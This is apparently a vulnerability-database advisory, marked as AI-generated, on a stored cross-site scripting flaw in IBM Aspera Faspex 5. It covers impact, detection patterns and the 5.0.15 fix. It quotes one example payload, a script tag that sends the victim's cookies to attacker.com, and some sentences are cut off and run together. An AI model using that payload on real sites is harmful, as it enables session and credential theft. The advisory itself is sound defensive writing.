
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-36226 is a stored cross-site scripting (XSS) vulnerability in IBM Aspera Faspex 5, affecting versions 5.0.0 through 5.0.14.3. It allows an authenticated user to embed arbitrary JavaScript code in the Web UI, potentially leading to credentials disclosure within a trusted session. The vulnerability was published on March 10, 2026, with a patch available as of the same date. It carries a CVSS v3.1 base score of 5.4 (Medium) (IBM Advisory, Red Hat CVE).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored XSS variant. An authenticated attacker can inject malicious JavaScript into user-controllable fields within the Faspex Web UI; the injected code is then stored and later executed in the browsers of other users who view the affected content. Exploitation requires low privileges (an authenticated account) and user interaction from a victim, but operates within a changed scope — meaning the injected script can affect resources beyond the attacker's own session. No public proof-of-concept code has been identified (IBM Advisory, Red Hat CVE).
Successful exploitation could allow an attacker to steal session tokens or login credentials from other authenticated users operating within trusted sessions, effectively enabling account takeover or credential harvesting. The injected JavaScript can also modify application behavior or content displayed to victims, potentially facilitating phishing or further attacks within the Faspex environment. Confidentiality and integrity are both impacted at a low level per the CVSS assessment, while availability is not directly affected (IBM Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable field.<script>, onerror=, javascript:) in POST request bodies to Faspex input endpoints; repeated requests from a single low-privileged account submitting content with script tags.IBM has released version 5.0.15 of Aspera Faspex 5 to address this vulnerability; all users running versions 5.0.0 through 5.0.14.3 should upgrade immediately (IBM Advisory). As interim mitigations, administrators should implement Content Security Policy (CSP) headers to limit the impact of any XSS, enforce strict input validation and output encoding on the server side, and restrict access to the Faspex Web UI to trusted networks where possible. Monitor application logs for suspicious JavaScript injection attempts in user-controllable fields.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."